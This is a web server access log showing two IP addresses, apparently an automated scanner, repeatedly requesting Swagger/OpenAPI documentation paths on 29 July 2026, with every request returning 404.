34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:57 +0000] "GET /swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger/index.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:58 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:28:59 +0000] "GET /swagger/index.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:59 +0000] "GET /swagger/index.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:59 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:28:59 +0000] "GET /swagger/index.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:00 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:00 +0000] "GET /swagger/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:00 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:29:00 +0000] "GET /swagger/swagger-ui.html HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/swagger-ui.html/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/swagger-ui.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/ui/index/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:29:01 +0000] "GET /swagger/ui/index HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/ui/index/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/ui/index HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/v1/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/v1/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:02 +0000] "GET /swagger/v1/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.50 - - [29/Jul/2026:02:29:03 +0000] "GET /swagger/v1/swagger.json HTTP/2.0" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:03 +0000] "GET /swagger/v1/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:03 +0000] "GET /swagger/v1/swagger.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
34.19.116.55 - - [29/Jul/2026:02:29:03 +0000] "GET /swagger/v1/swagger.json/favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
